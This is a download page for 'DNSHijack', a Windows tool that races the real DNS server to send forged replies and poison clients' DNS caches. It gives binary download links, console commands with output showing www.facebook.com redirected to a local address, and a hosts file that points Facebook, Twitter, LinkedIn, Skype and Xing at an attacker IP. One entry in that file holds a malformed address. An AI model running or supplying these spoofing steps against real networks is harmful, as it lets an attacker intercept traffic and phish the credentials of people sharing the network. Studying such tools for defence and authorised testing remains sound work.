|
|
| Tool name : |
DNSHijack |
| |
| Description : |
DNSHijack is a simple and straightforward tool to send faked DNS replies back to client system. If DNSHijack is answering the request faster than the DNS server the requesting client will keep the spoofed IP address in its DNS cache. Requests to this host name are sent to the spoofed IP address.
|
| |
| Tested on : |
Windows 7 |
| |
| Feedback : |
In case you encounter any problems with the tool, you have suggestions to improve it, or you tested it with a Windows version i’ve not yet tested please drop me an email. |
| |
| Downloads : |
Version 0.1 – Binary |
| |
Version 0.2 – Binary |
| |
Version 0.3 – Binary |
| |
Version 0.4 – Binary |
| |
| Screen shot : |
|
| |
How to use it
Listing all the interfaces on the system
1
2
3
4
5
6
7
8
9
10
11
| C:\Users\run> DNSHijack.exe -l
Ifc no : 15
Adapter Name: {E21E6E6E-A74D-1ADB-ADEE-E6458989F824}
Adapter Desc: Dell Wireless 1701 802.11b/g/n
Adapter Addr: 94-1E-E7-DE-AD-D9
Index: 15
Type: Unknown type 71
IP Address: 192.168.10.146
IP Mask: 255.255.255.0
...
C:\Users\run> |
Starting DNSHijack
1
2
3
4
5
6
7
8
9
10
11
| C:\Users\run> DNSHijack.exe E21E6E6E-A74D-1ADB-ADEE-E6458989F824
AddToList(1) : /www.twitter.com/192.168.1.103/
AddToList(1) : /twitter.com/192.168.1.103/
AddToList(1) : /www.xing.com/192.168.1.103/
AddToList(1) : /www.facebook.com/192.168.1.103/
[2012-04-03 18:12:47] Request from 192.168.1.105 to DNS server 88.84.0.2
Redirecting www.facebook.com to 192.168.1.103
...
C:\Users\run> |
Configuration file hosts.txt
1
2
3
4
5
6
| www.skype.com:192.168.1.103
www.linkedin.com:192.168.0.1.103
www.twitter.com:192.168.1.103
twitter.com:192.168.1.103
www.xing.com:192.168.1.103
www.facebook.com:192.168.1.103 |
tags: Cache, DNS, Hacking, Poisoning, Spoofing
